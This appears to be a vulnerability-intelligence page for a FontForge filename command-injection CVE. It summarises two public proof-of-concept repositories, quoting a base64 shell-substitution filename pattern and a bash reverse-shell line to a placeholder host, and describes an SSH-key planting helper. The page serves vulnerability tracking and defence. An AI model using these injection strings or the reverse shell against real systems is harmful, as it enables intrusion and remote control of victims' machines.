FontForge through version 20230101 contains a command injection vulnerability in the Splinefont component. The vulnerability is triggered when a crafted filename is processed, allowing an attacker to inject and execute arbitrary commands on the system running FontForge.
Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.
What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.
What an attacker gets, and what they’ve been doing with it.
If you can’t patch tonight, do this now.
Patch, then assume compromise.
2 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (1 hidden).
This repository contains two standalone Python proof-of-concept exploits plus minimal documentation. It is not part of a larger exploit framework. The top-level README describes the repository as PoCs for two privilege-escalation related issues: CVE-2024-25081 in FontForge and CVE-2025-47273 in setuptools. Repository structure: - README.md: high-level description of both CVEs and their intended impact. - CVE-2024-25081/CVE-2024-25081.py: Python exploit that builds a malicious ZIP archive. - CVE-2025-47273/CVE-2025-47273.py: Python exploit/helper that generates SSH keys and serves an authorized_keys file over HTTP. - CVE-2025-47273/README.md: brief dependency note for the cryptography library. CVE-2024-25081 exploit details: - Accepts --lhost, --lport, and optional --zip. - Constructs a bash reverse shell command using /dev/tcp/<LHOST>/<LPORT>. - Base64-encodes the reverse shell and embeds it in a ZIP entry filename using shell substitution syntax: $(echo${IFS}'... '|base64${IFS}-d|bash). - Writes an empty file into the ZIP under that malicious filename. - The intended effect is command injection when a vulnerable FontForge workflow processes the ZIP and unsafely passes the filename to a shell. - Main capability: code execution as the user running FontForge, with a reverse shell back to the attacker. CVE-2025-47273 exploit details: - Accepts --lhost and --format, though only ed25519 and rsa are actually implemented in code despite argparse also listing ecdsa. - Generates an SSH keypair using the cryptography library. - Saves the private key to rootkey, the public key to rootkey.pub, and duplicates the public key into authorized_keys. - Starts a simple HTTP server on port 8000 and serves the authorized_keys file for any GET request. - The script itself does not perform the traversal/write against the target; instead, it prepares attacker-controlled content and hosting infrastructure for a vulnerable setuptools-based fetch/write path. The README indicates the operator should execute a script where setuptools is vulnerable and URL-encode the path. - Main capability: support for privilege escalation/persistence by planting an SSH public key into a privileged account's authorized_keys file, potentially enabling root SSH login if the vulnerable target writes the file into the correct location. Overall assessment: - These are real exploit PoCs rather than scanners or detection scripts. - The FontForge exploit is a direct weaponized file generator with a hardcoded reverse-shell pattern. - The setuptools exploit is more of an exploitation helper/primitive: it generates the key material and hosts it, but relies on a separate vulnerable workflow to fetch and write the file to a sensitive path. - Both scripts are operational but relatively simple, with limited error handling and no advanced automation.
Small standalone PoC repository with 4 files: a Python exploit generator, README, writeup, and license. The main code is exploit.py, which accepts --lhost, --lport, and optional --output, then builds a malicious ZIP archive using Python's zipfile module. The exploit works by placing a command-injection string in the ZIP entry filename, appending a .ttf extension, and writing dummy font content into that entry. The injected command is a base64-wrapped bash reverse shell: it decodes and executes 'bash -i >& /dev/tcp/<lhost>/<lport> 0>&1'. This indicates the exploit's primary capability is remote code execution leading to an interactive reverse shell, assuming a vulnerable FontForge-based processing pipeline interprets the crafted filename unsafely. The repository is not part of a larger exploit framework. It appears to be a basic operational PoC rather than a detection tool. The README describes the target as CVE-2024-25082, while the code docstring, argparse description, and writeup refer to CVE-2024-25081; this inconsistency is notable and suggests either mislabeling or mixed documentation. The writeup provides additional context showing a likely vulnerable Linux processing flow involving /opt/process_client_submissions.bak iterating over /var/www/html/uploads/*.zip and invoking 'fontforge -script /opt/process_font.pe'. Overall purpose: generate a malicious ZIP for delivery to a system that processes uploaded ZIP/font files with FontForge, causing command execution via a crafted filename and returning a shell to the attacker-controlled listener.
Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.
Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.
No public activity tracked yet. Mallory keeps watching.
No public activity observed for this vulnerability.
Query your assets running an affected version, and investigate the blast radius.
Every observed campaign linking this CVE to a named adversary.
Malware families riding this exploit, with evidence and IOCs.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Cross-references every affected SKU, including bundled OEM variants.
Community discussion across Reddit, Mastodon, and other social sources.